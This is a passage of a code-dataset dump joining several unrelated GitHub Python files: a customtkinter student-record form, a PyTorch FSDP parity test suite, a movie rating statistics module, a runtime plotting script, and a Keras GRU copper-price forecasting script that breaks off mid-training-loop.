text=\"Enter student details\", )\r\nlabel.pack(pady=12, padx=10)\r\n\r\ntxt3=StringVar()\r\nlabel2= CTkLabel(master=frame, text=\"Name\", )\r\nlabel2.pack( padx=10)\r\nentry= CTkEntry(master=frame ,width= 200,textvariable=txt3)\r\nentry.pack( padx=10)\r\nname=entry.get()\r\n\r\n\r\ntxt= StringVar()\r\nlabel4= CTkLabel(master=frame, text=\"Enrollment No.\", )\r\nlabel4.pack( padx=10)\r\nentry1= CTkEntry(master=frame, width= 200, textvariable=txt)\r\nentry1.pack( padx=10, )\r\nent=entry1.get()\r\n\r\ntxt2=StringVar()\r\nlabel3= CTkLabel(master=frame, text=\"Birth Date\", )\r\nlabel3.pack( padx=10)\r\nentry2= CTkEntry(master=frame, width= 200,textvariable=txt2)\r\nentry2.pack( padx=10)\r\nbir=entry2.get()\r\n\r\nb1= CTkButton(master=frame, text= \"search\", command=get )\r\nb1.pack(pady=30, padx=10)\r\nbtn= CTkRadioButton(master=frame, text=\"light mode\", command=ldMode )\r\nbtn.pack(pady=8)\r\nbtn1= CTkRadioButton(master=frame, text=\"dark mode\", command=dMode)\r\nbtn1.pack(pady=8)\r\nroot.mainloop()\r\n\r\n\r\n\r\n","repo_name":"Suyash1855/StudentRecordPortal","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14821156869","text":"# Owner(s): [\"oncall: distributed\"]\n\nimport contextlib\nimport functools\nimport itertools\nimport sys\nfrom typing import Any, Callable, Dict, List, Optional\nfrom unittest import mock\n\nimport torch\nimport torch.distributed as dist\nimport torch.nn as nn\nfrom torch.distributed.fsdp import CPUOffload, MixedPrecision\nfrom torch.distributed.fsdp._flat_param import FlatParamHandle\nfrom torch.distributed.fsdp.fully_sharded_data_parallel import (\n BackwardPrefetch,\n FullyShardedDataParallel as FSDP,\n ShardingStrategy,\n)\nfrom torch.distributed.fsdp.wrap import ModuleWrapPolicy\nfrom torch.distributed.utils import _p_assert\nfrom torch.testing._internal.common_distributed import 
skip_if_lt_x_gpu\nfrom torch.testing._internal.common_fsdp import (\n AlwaysWrapNestedWrappedModule,\n CUDAInitMode,\n DummyDDP,\n FSDPInitMode,\n FSDPTest,\n MixtureOfExperts,\n NestedWrappedModule,\n NestedWrappedModuleWithDelay,\n subtest_name,\n TransformerWithSharedParams,\n)\nfrom torch.testing._internal.common_utils import (\n instantiate_parametrized_tests,\n parametrize,\n run_tests,\n TEST_WITH_DEV_DBG_ASAN,\n)\n\nif not dist.is_available():\n print(\"Distributed not available, skipping tests\", file=sys.stderr)\n sys.exit(0)\n\nif TEST_WITH_DEV_DBG_ASAN:\n print(\n \"Skip dev-asan as torch + multiprocessing spawn have known issues\",\n file=sys.stderr,\n )\n sys.exit(0)\n\nparams = \"cpu_offload,sharding_strategy\"\ncpu_offload_config = [CPUOffload(offload_params=True), CPUOffload(offload_params=False)]\nsharding_strategy_config = [\n None,\n ShardingStrategy.SHARD_GRAD_OP,\n ShardingStrategy.NO_SHARD,\n]\nconfigs = list(itertools.product(cpu_offload_config, sharding_strategy_config))\ntest_name_mapping = {\n str(CPUOffload(offload_params=True)): \"offload_true\",\n str(CPUOffload(offload_params=False)): \"offload_false\",\n str(ShardingStrategy.SHARD_GRAD_OP): \"shard_grad_op\",\n str(ShardingStrategy.NO_SHARD): \"no_shard\",\n}\n\nsubtest_name = functools.partial(subtest_name, test_name_mapping)\n\n\nclass TestParityWithDDP(FSDPTest):\n \"\"\"\n Compare losses and parameter values after several updates when using\n PyTorch DDP vs. FullyShardedDataParallel.\n \"\"\"\n\n def _get_cuda_init_modes(self, cpu_offload: CPUOffload) -> List[CUDAInitMode]:\n modes = [\n CUDAInitMode.CUDA_AFTER,\n CUDAInitMode.CUDA_BEFORE,\n ]\n # Note that CUDAInitMode.CUDA_NEVER works currently only with CPU\n # offload as we explicitly bring the param back to CUDA device. 
In\n # general, it will not work since we try to all_gather p.data which is\n # on CPU but NCCL only supports GPU.\n if cpu_offload.offload_params:\n modes.append(CUDAInitMode.CUDA_NEVER)\n\n return modes\n\n def _get_subtest_config(self, cpu_offload: CPUOffload) -> Dict[str, List[Any]]:\n \"\"\"Returns a subtest configuration that subtests CUDA initialization\n modes and prefetching settings together.\"\"\"\n return {\n \"cuda_init_mode\": self._get_cuda_init_modes(cpu_offload),\n \"backward_prefetch\": [\n None,\n BackwardPrefetch.BACKWARD_PRE,\n BackwardPrefetch.BACKWARD_POST,\n ],\n \"forward_prefetch\": [False, True],\n \"use_orig_params\": [False, True],\n }\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_nested_wrapped_model(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n NestedWrappedModule,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_nested_wrapped_model_single_iteration_mixed_precision(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n mixed_precision = MixedPrecision(\n param_dtype=torch.float16,\n buffer_dtype=torch.float16,\n reduce_dtype=torch.float16,\n )\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n NestedWrappedModule,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n num_iters=1,\n mixed_precision=mixed_precision,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_nested_always_wrap_model(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n AlwaysWrapNestedWrappedModule,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_transformer(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n TransformerWithSharedParams,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_delayed_optim_step(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n \"\"\"Tests the FSDP forward, backward, and optimizer step runtime by\n using a model with a long CUDA delay after the loss computation/before\n the optimizer step to exercise the internal CUDA stream usage in that\n the forward pass all-gathers do not start until after the optimizer\n step completes.\"\"\"\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n NestedWrappedModuleWithDelay,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n init_kwargs={\"delay_after_loss_ms\": 250},\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_delayed_reduce_scatter(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n \"\"\"Tests the FSDP forward, backward, and optimizer step runtime by\n using a model with a 
long CUDA delay before the gradient reduce-scatter\n to exercise the internal CUDA stream usage in that the backward pass\n waits for those reductions to finish.\"\"\"\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n NestedWrappedModuleWithDelay,\n FSDPInitMode.RECURSIVE,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n init_kwargs={\"delay_before_reduction_ms\": 250},\n )\n\n def _dummy_ddp_fn(self, model):\n # `MixtureOfExperts`` implements custom gradient reduction logic, so\n # the reference behavior should follow that logic instead of DDP\n return DummyDDP(model)\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_mixture_of_experts(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n MixtureOfExperts,\n FSDPInitMode.RECURSIVE,\n ref_init_fn=self._dummy_ddp_fn,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n )\n\n @skip_if_lt_x_gpu(2)\n @parametrize(params, configs, subtest_name)\n def test_mixture_of_experts_with_delay_before_free(\n self,\n cpu_offload: CPUOffload,\n sharding_strategy: Optional[ShardingStrategy],\n ):\n self.run_subtests(\n self._get_subtest_config(cpu_offload),\n self._test_fsdp_parity,\n MixtureOfExperts,\n FSDPInitMode.RECURSIVE,\n ref_init_fn=self._dummy_ddp_fn,\n cpu_offload=cpu_offload,\n sharding_strategy=sharding_strategy,\n init_kwargs={\"delay_before_free_ms\": 250},\n )\n\n\nclass TestParamInit(FSDPTest):\n @skip_if_lt_x_gpu(2)\n @parametrize(\"mixed_precision\", [True, False])\n def test_param_change_after_init(self, mixed_precision):\n \"\"\"\n Tests that changing FSDP model parameter values in-place after FSDP\n initialization persist.\n \"\"\"\n # Establish reference behavior\n fsdp_kwargs = {}\n if mixed_precision:\n fsdp_kwargs[\"mixed_precision\"] = MixedPrecision()\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_AFTER,\n fsdp_kwargs,\n deterministic=True,\n )\n input = fsdp_model.module.get_input(torch.device(\"cuda\"))\n ref_output = fsdp_model(*input)\n # Initialize the same model but change its first parameter value\n # in-place after FSDP initialization\n new_fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_AFTER,\n fsdp_kwargs,\n deterministic=True,\n )\n first_param = next(new_fsdp_model.parameters())\n nn.init.normal_(first_param.data)\n new_output = new_fsdp_model(*input)\n self.assertNotEqual(\n ref_output,\n new_output,\n msg=\"new_output did not reflect change to param after init\",\n )\n\n\nclass TestHooks(FSDPTest):\n @skip_if_lt_x_gpu(2)\n @parametrize(\"cuda_first\", [False, True])\n def test_pre_backward_hook_registration(self, cuda_first: bool):\n \"\"\"Tests that FSDP pre-backward hooks are registered on forward pass\n outputs.\"\"\"\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_BEFORE if cuda_first else CUDAInitMode.CUDA_AFTER,\n )\n self._test_pre_backward_hook_registration(fsdp_model)\n\n @skip_if_lt_x_gpu(2)\n def test_pre_backward_hook_registration_after_state_dict(self):\n \"\"\"Tests that FSDP pre-backward hooks are registered on forward pass\n outputs after saving and loading the model from a checkpoint.\"\"\"\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n 
FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_AFTER,\n )\n self._train_for_several_steps(fsdp_model, num_steps=2, autocast=False)\n state_dict = fsdp_model.state_dict()\n fsdp_model.load_state_dict(state_dict)\n self._test_pre_backward_hook_registration(fsdp_model)\n\n def _test_pre_backward_hook_registration(self, model):\n optim = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.9)\n optim.zero_grad()\n # Inputs always cuda, as computation happens on CUDA device only\n input = model.module.get_input(torch.device(\"cuda\"))\n output = model(*input)\n # this is pre-bwd hook\n self.assertEqual(len(output._backward_hooks), 1)\n loss = model.module.get_loss(input, output).cuda()\n loss.backward()\n # It doesn't get removed\n self.assertEqual(len(output._backward_hooks), 1)\n optim.step()\n self.assertEqual(len(output._backward_hooks), 1)\n\n @skip_if_lt_x_gpu(2)\n @parametrize(\"cuda_first\", [False, True])\n @parametrize(\"mixed_precision\", [True, False])\n def test_register_functions_called(self, cuda_first: bool, mixed_precision: bool):\n \"\"\"Tests that ``_register_{pre|post}_backward_hooks()`` are called\n during the FSDP forward.\"\"\"\n fsdp_kwargs = {}\n if mixed_precision:\n fsdp_kwargs[\"mixed_precision\"] = MixedPrecision()\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_BEFORE if cuda_first else CUDAInitMode.CUDA_AFTER,\n fsdp_kwargs,\n )\n input = fsdp_model.module.get_input(torch.device(\"cuda\"))\n\n # Since `_register_pre_backward_hooks()` modifies the forward output,\n # we cannot directly mock it. We implement our own counter instead.\n orig_register_pre_backward_hooks = (\n torch.distributed.fsdp._runtime_utils._register_pre_backward_hooks\n )\n register_pre_backward_hooks_call_count = 0\n\n def _register_pre_backward_hooks_with_count(*args, **kwargs):\n nonlocal register_pre_backward_hooks_call_count\n register_pre_backward_hooks_call_count += 1\n return orig_register_pre_backward_hooks(*args, **kwargs)\n\n with mock.patch(\n \"torch.distributed.fsdp._runtime_utils._register_pre_backward_hooks\",\n _register_pre_backward_hooks_with_count,\n ), mock.patch(\n \"torch.distributed.fsdp._runtime_utils._register_post_backward_hook\"\n ) as register_post_bwd_mock:\n self.assertEqual(register_pre_backward_hooks_call_count, 0)\n self.assertFalse(register_post_bwd_mock.called)\n fsdp_model(*input)\n self.assertTrue(register_pre_backward_hooks_call_count > 0)\n self.assertTrue(register_post_bwd_mock.called)\n\n\nclass TestNoGrad(FSDPTest):\n @skip_if_lt_x_gpu(2)\n @parametrize(\"mixed_precision\", [True, False])\n def test_transformer_no_grad(self, mixed_precision):\n \"\"\"Tests that for an FSDP-wrapped transformer model with shared\n parameters, after training for one iteration, running a forward pass in\n ``eval()`` mode gives the same output as running a forward pass in\n ``torch.no_grad()``.\"\"\"\n fsdp_kwargs = {}\n if mixed_precision:\n fsdp_kwargs[\"mixed_precision\"] = MixedPrecision(\n param_dtype=torch.float16,\n reduce_dtype=torch.float16,\n buffer_dtype=torch.float16,\n )\n else:\n fsdp_kwargs[\"mixed_precision\"] = None\n fsdp_model = TransformerWithSharedParams.init(\n self.process_group,\n FSDPInitMode.RECURSIVE,\n CUDAInitMode.CUDA_AFTER,\n fsdp_kwargs,\n )\n self._train_for_several_steps(\n fsdp_model,\n num_steps=1,\n autocast=False,\n mixed_precision=fsdp_kwargs[\"mixed_precision\"],\n )\n input = fsdp_model.module.get_input(torch.device(\"cuda\"))\n # Run a forward in eval mode\n 
fsdp_model.eval()\n ref_output = fsdp_model(*input)\n # Run a forward in `no_grad()` and compare\n with torch.no_grad():\n no_grad_output = fsdp_model(*input)\n self.assertEqual(ref_output, no_grad_output)\n\n\nclass TestAutograd(FSDPTest):\n @skip_if_lt_x_gpu(2)\n def test_unshard_params_as_tensors(\n self,\n ):\n \"\"\"\n Tests that FSDP always unshards the logical parameters as ``Tensor``\n views during forward and backward computation even when forward and/or\n backward prefetching.\n \"\"\"\n self.run_subtests(\n {\n \"sharding_strategy\": [\n ShardingStrategy.FULL_SHARD,\n ShardingStrategy.SHARD_GRAD_OP\n # Skip testing `NO_SHARD` since it doubly uses\n # `_use_unsharded_views()` for sharded views. Testing\n # `FULL_SHARD` and `SHARD_GRAD_OP` provides good confidence\n # that the `as_params` logic is correct.\n ],\n \"use_orig_params\": [False, True],\n \"forward_prefetch\": [False, True],\n \"backward_prefetch\": [\n BackwardPrefetch.BACKWARD_PRE,\n BackwardPrefetch.BACKWARD_POST,\n None,\n ],\n },\n self._test_unshard_params_as_tensors,\n )\n\n def _test_unshard_params_as_tensors(\n self,\n sharding_strategy: ShardingStrategy,\n use_orig_params: bool,\n forward_prefetch: bool,\n backward_prefetch: Optional[BackwardPrefetch],\n ):\n orig_use_unsharded_views = FlatParamHandle._use_unsharded_views\n\n def _use_unsharded_views_assert_as_tensors(\n self: FlatParamHandle, as_params: bool\n ) -> None:\n _p_assert(\n not as_params, \"Expects to use Tensor views but using parameter views\"\n )\n return orig_use_unsharded_views(self, as_params)\n\n fsdp_kwargs = {\n \"sharding_strategy\": sharding_strategy,\n \"use_orig_params\": use_orig_params,\n \"forward_prefetch\": forward_prefetch,\n \"backward_prefetch\": backward_prefetch,\n \"auto_wrap_policy\": ModuleWrapPolicy({nn.Linear}),\n }\n device = torch.device(\"cuda\")\n # Define a model with enough FSDP instances to exercise prefetching\n NUM_LINEARS = 5\n model = nn.Sequential(\n *[nn.Linear(3, 3, device=device) for _ in range(NUM_LINEARS)]\n )\n fsdp_model = FSDP(model, **fsdp_kwargs)\n self.assertEqual(len(list(FSDP.fsdp_modules(fsdp_model))), NUM_LINEARS + 1)\n for _ in range(3):\n inp = torch.randn((2, 3), device=device)\n with self._patch_use_unsharded_views(\n _use_unsharded_views_assert_as_tensors\n ):\n loss = fsdp_model(inp).sum()\n loss.backward()\n\n @contextlib.contextmanager\n def _patch_use_unsharded_views(self, new_use_unsharded_views: Callable):\n orig_use_unsharded_views = FlatParamHandle._use_unsharded_views\n FlatParamHandle._use_unsharded_views = new_use_unsharded_views\n try:\n yield\n finally:\n FlatParamHandle._use_unsharded_views = orig_use_unsharded_views\n\n\ninstantiate_parametrized_tests(TestHooks)\ninstantiate_parametrized_tests(TestParityWithDDP)\ninstantiate_parametrized_tests(TestNoGrad)\ninstantiate_parametrized_tests(TestParamInit)\n\nif __name__ == \"__main__\":\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/distributed/fsdp/test_fsdp_core.py","file_name":"test_fsdp_core.py","file_ext":"py","file_size_in_byte":18790,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"11277684336","text":"import json\nfrom utilities.SaveLoadJson import SaveLoadJson\n\nclass Stats:\n filename = 'ratings.txt'\n filename2 = 'parameters.txt'\n dataFile = 'dataStore.txt'\n\n @staticmethod\n #Adjusts weights based on if ratings exists so they add up to 1\n def adjust(weights, newWeights, avgHold):\n total = 0\n for key, value in weights.items():\n 
if avgHold[key][0] > 0.0:\n total += value\n total = 1 / total\n for key, value in weights.items():\n newWeights[key] = total*value\n\n @staticmethod\n def analyze():\n\n #People to look at\n works = [\"Actors\",\"Directors\",\"Writers\",\"Producers\"]\n #Averages to look at\n values = [\"Genres\", \"Average\",\"Company\",\"Year\"]\n\n newWeights = {}\n\n avgHold = {\"Actors\":[0.0,0,0.0],\n \"Directors\":[0.0,0,0.0],\n \"Writers\":[0.0,0,0.0],\n \"Producers\":[0.0,0,0.0],\n \"Genres\":[0.0,0,0.0],\n \"Company\":[0.0,0,0.0],\n \"Year\":[0.0,0,0.0],\n \"Average\":[0.0,0,0.0],\n \"Max\":[10.0,1,0.0],\n \"Min\":[0.0001,1,0.0]\n }\n\n #Output format - what we're sending back to the user\n result = {\"Name\":\"\",\n \"Average\":\"\",\n \"Actual\":\"\",\n \"Error\":\"\",\n \"Id\":\"\",\n \"Imdb_id\":\"\"}\n \n print(\"Doing math!\")\n factors = SaveLoadJson.load(Stats.filename) #Load factors\n parameters = SaveLoadJson.load(Stats.filename2) #Load parameters\n data = SaveLoadJson.load(Stats.dataFile) #Load data\n\n weights = data[\"weights\"] #Copy weights from Json\n\n totalQueries = 3 #Required to find name, get movie, and get credits\n observed = 0.0 #Final average\n\n #Moving through the data-------------------------------\n #Stuff with works\n for key in works:\n for person in factors[key]:\n totalQueries += 1\n for item in person[\"works\"]:\n if item[\"rating\"] != \"0\":\n avgHold[key][0] += float(item[\"rating\"])\n avgHold[key][1] += float(person[\"total_works\"])\n\n #Stuff with averages\n for key in values:\n avgHold[key][0] = sum(factors[key])\n avgHold[key][1] = len(factors[key])\n\n Stats.adjust(weights, newWeights, avgHold)\n\n for key, value in avgHold.items():\n if(value[0] > 0):\n avgHold[key][0] = value[0]/value[1]\n avgHold[key][2] = (value[0])*newWeights[key]\n observed += avgHold[key][2]\n\n #Modify the weights for a better fit -------------------\n if float(parameters[\"Rating\"]) != 0:\n modifier = 0.1\n if data[\"totalAdjusts\"] > 10000:\n modifier = 0.00001\n elif data[\"totalAdjusts\"] > 1000:\n modifier = 0.0001\n elif data[\"totalAdjusts\"] > 100:\n modifier = 0.001\n elif data[\"totalAdjusts\"] > 10:\n modifier = 0.01\n\n for key, value in avgHold.items():\n if value[0] != 0 and value[0] != float(parameters[\"Rating\"]):\n if value[0] > observed and float(parameters[\"Rating\"]) > observed:\n weights[key] = float(\"{0:.5f}\".format(weights[key]+modifier))\n if value[0] < observed and float(parameters[\"Rating\"]) < observed:\n weights[key] = float(\"{0:.5f}\".format(weights[key]+modifier))\n if value[0] > observed and float(parameters[\"Rating\"]) < observed:\n weights[key] = float(\"{0:.5f}\".format(weights[key]-modifier))\n if value[0] < observed and float(parameters[\"Rating\"]) > observed:\n weights[key] = float(\"{0:.5f}\".format(weights[key]-modifier))\n\n #Formatting results --------------------------------------\n #Percent error\n percentError = 0\n if float(parameters[\"Rating\"]) != 0:\n percentError = (abs(float(parameters[\"Rating\"])-observed)/float(parameters[\"Rating\"]))*100\n\n result[\"Error\"]=str(format(percentError,'.2f'))\n result[\"Actual\"]=str(parameters[\"Rating\"])\n result[\"Average\"]=str(format(observed, '.1f'))\n result[\"Name\"]=str(parameters[\"Title\"])\n result[\"Id\"]=str(parameters[\"Id\"])\n result[\"Imdb_id\"]=str(parameters[\"Imdb_id\"])\n \n #Save data to file --------------------------------------\n data[\"weights\"] = weights\n data[\"totalQueries\"] += totalQueries\n data[\"totalAdjusts\"] += 1\n if len(data[\"ratings\"]) 
> data[\"totalAdjusts\"]/2 or len(data[\"ratings\"]) > 1000:\n data[\"ratings\"].pop(0)\n data[\"ratings\"].append(json.dumps(result))\n SaveLoadJson.save(Stats.dataFile, data)\n\n return result\n","repo_name":"UCSB-dataScience-ProjectGroup/movie_rating_prediction","sub_path":"src/models/Stats.py","file_name":"Stats.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13443769090","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nimport matplotlib.style as style\nstyle.use('ggplot')\n\nfrom matplotlib import rc\nrc({'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n\ndef read_out(filepath):\n seq_runtimes = list()\n top_down_runtimes = list()\n with open(filepath, \"r\") as f:\n lines = f.readlines()\n for line in lines:\n line_split = line.split(\" \")\n data = [int(float(x)) for x in line_split]\n seq_runtimes.append(data[0])\n top_down_runtimes.append(data[1])\n print(data)\n seq_runtimes = np.array(seq_runtimes)\n top_down_runtimes = np.array(top_down_runtimes)\n # print(\"Average Top Down Runtime:\", np.mean(top_down_runtimes)/1e6, \"ms\")\n # print(\"Average Bottom Up Runtime:\", np.mean(bottom_up_runtimes)/1e6, \"ms\")\n # print(\"Average Hybrid Runtime:\", np.mean(hybrid_runtimes)/1e6, \"ms\")\n return np.mean(seq_runtimes), np.mean(top_down_runtimes)\n\ndef plot_runtimes(prefix):\n ts = np.arange(1,9)\n avg_seq_runtimes = [590438225,590330997,590942967,590062792,589954669,589243878,591409536,592531934]\n avg_par_runtimes = [591566717,309022344,219178613,176232405,156674935,144091538,134204101,131053753]\n avg_seq_runtimes = list(map(lambda x : x/1e6, avg_seq_runtimes))\n avg_par_runtimes = list(map(lambda x : x/1e6, avg_par_runtimes))\n # for t in ts:\n # avg_seq_runtime, avg_top_down_par_runtime = read_out(os.path.join(prefix, \"le_lists_powerlaw2_\" + str(t) + \".txt\"))\n # avg_seq_runtimes.append(avg_seq_runtime)\n # avg_top_down_par_runtimes.append(avg_top_down_par_runtime)\n # plt.plot(ts, avg_seq_runtimes)\n plt.plot(ts, avg_seq_runtimes)\n plt.plot(ts, avg_par_runtimes)\n plt.xlabel(\"Number of Threads\")\n plt.ylabel(\"Time (ms)\")\n plt.legend([\"Sequential\", \"Parallel\"])\n plt.title(\"LE-Lists Runtimes on Random Powerlaw Graphs ($|V| = 20000$, $\\mu_{deg} = 10$, $p = 0.25$)\", fontsize=12)\n plt.savefig(\"le_lists_plots/le_lists_runtimes.png\", dpi=500)\n plt.show()\n\nprefix = \"../results/le_lists/\"\nplot_runtimes(prefix)","repo_name":"ptartan21/15418_Project","sub_path":"src/plot/le_lists_plot.py","file_name":"le_lists_plot.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"69934812394","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\"\"\"\nUtility used by the Network class to actually train.\n\nBased on:\n https://github.com/fchollet/keras/blob/master/examples/mnist_mlp.py\n\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom tensorflow import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, GRU, Flatten\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import EarlyStopping\nfrom tensorflow.keras.metrics import Metric\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\ngpu_options = tf.compat.v1.GPUOptions(per_process_gpu_memory_fraction=0.3)\nsess = 
tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(gpu_options=gpu_options))\ntf.compat.v1.keras.backend.set_session(sess)\n\n\n# In[3]:\n\n\nnp.set_printoptions(suppress=True)\n\n\n# In[4]:\n\n\nfrom sklearn.preprocessing import MinMaxScaler\nsc = MinMaxScaler(feature_range = (0, 1))\n\n\n# In[5]:\n\n\ndef read(path):\n return pd.read_csv(path)\n\n\n# In[6]:\n\n\ndef buildTrain(train, pastWeek, futureWeek=1, defaultWeek=1):\n X_train, Y_train = [], []\n for i in range(train.shape[0]-futureWeek-pastWeek):\n \n X = np.array(train.iloc[i:i+pastWeek,:])\n \n X_train.append(X.reshape(X.size))\n Y_train.append(np.array(train.iloc[i+pastWeek:i+pastWeek+futureWeek][\"CCSP\"]))\n return (np.array(X_train), np.array(Y_train))\n\n\n# In[7]:\n\n\ndef get_data(timeLag):\n \n ## Read weekly copper price data\n path = \"WeeklyFinalData.csv\"\n data = read(path)\n \n date = data[\"Date\"]\n data.drop(\"Date\", axis=1, inplace=True)\n \n ## Add time lag (pastWeek=4, futureWeek=1)\n x_data, y_data = buildTrain(data, timeLag)\n \n ## Data split\n x_train = x_data[0:int(x_data.shape[0]*0.8)]\n x_test = x_data[int(x_data.shape[0]*0.8):]\n \n y_train = y_data[0:int(y_data.shape[0]*0.8)]\n y_test = y_data[int(y_data.shape[0]*0.8):]\n \n ## Other information\n nb_output = 1\n \n return (nb_output, x_train, x_test, y_train, y_test)\n\n\n# In[18]:\n\n\n# path = \"WeeklyFinalData.csv\"\n# data = read(path)\n\n# date = data[\"Date\"]\n# data.drop(\"Date\", axis=1, inplace=True)\n\n# ## Add time lag (pastWeek=4, futureWeek=1)\n# x_data, y_data = buildTrain(data, 30)\n# print(x_data.shape)\n# # print(x_data.reshape(-1,3,15)[0])\n# # print(y_data[0])\n# # print(x_data.shape, y_data.shape)\n\n\n# In[9]:\n\n\ndef compile_model(nb_neurons, nb_layers, optimizer, nb_output, input_shape):\n \"\"\"Compile a sequential model.\n\n Args:\n network (dict): the parameters of the network\n\n Returns:\n a compiled network.\n\n \"\"\"\n # Get our network parameters.\n keras.backend.clear_session()\n model = Sequential()\n\n # Add each layer.\n for i in range(nb_layers):\n\n # Need input shape for first layer.\n if i == 0:\n model.add(GRU(units = nb_neurons, batch_input_shape=input_shape, return_sequences=True))\n if i==(nb_layers-1):\n model.add(GRU(units = nb_neurons, batch_input_shape=input_shape))\n else:\n model.add(GRU(units = nb_neurons, return_sequences=True))\n\n# model.add(Dropout(0.2)) # hard-coded dropout\n\n # Output layer.\n# model.add(Flatten())\n model.add(Dense(units = nb_output))\n\n# print(model.summary())\n model.compile(loss='mean_squared_error', optimizer=optimizer)\n\n \n return model\n\n\n# In[10]:\n\n\ndef train_and_score(Network):\n \"\"\"Train the model, return test loss.\n\n Args:\n network (dict): the parameters of the network\n dataset (str): Dataset to use for training/evaluating\n\n \"\"\"\n\n ## The moving window mechanism for incremental learning (# of batch)\n batch_size = Network.network['batch_size']\n \n ## The time lag as forecasting variable (# of sequence)\n window_size = Network.network['window_size']\n \n ## The hyperparameter for GRU\n nb_neurons = Network.network['nb_neurons']\n nb_layers = Network.network['nb_layers']\n optimizer = Network.network['optimizer']\n\n ## Get the training data from help method: get_data(window_size)\n nb_output, x_train, x_test, y_train, y_test = get_data(window_size)\n \n ## The number of forecasting variable (# of variable)\n nb_input_factor = 15\n \n ## Data transformation\n x_train_scaled = 
sc.fit_transform(x_train).reshape(-1,window_size,nb_input_factor)\n x_test_scaled = sc.transform(x_test).reshape(-1,window_size,nb_input_factor)\n y_train_scaled = sc.fit_transform(y_train)\n \n ## Define the GRU input_shape and compile the model\n input_shape = (None, window_size, nb_input_factor)\n model = compile_model(nb_neurons, nb_layers, optimizer, nb_output, input_shape)\n \n ## The volume of training data\n nb_data = x_train_scaled.shape[0]\n \n ## The performance_indicator list to store loss and accuracy\n performance_indicator = pd.DataFrame(columns=[\"Loss_train\",\"Accuracy_train\",\"Loss_test\",\"Accuracy_test\"])\n \n ## The times of training\n epoch = 300\n \n ## The training step of GRU\n for e in range(epoch):\n \n minimum_loss = np.inf\n current_times = 0\n\n if (current_times > 5):\n\n model.load_weights(\"model_weight.h5\")\n Network.set_model(model)\n # Network.set_weights(model.get_weights())\n break\n\n else:\n\n for i in range(0, nb_data-batch_size+1):\n\n end = i + batch_size\n\n if end < nb_data:\n x = x_train_scaled[i:end]\n y = y_train_scaled[i:end]\n# print(x.shape,y.shape)\n model.train_on_batch(x, y)\n\n else:\n x = x_train_scaled[i:nb_data]\n y = 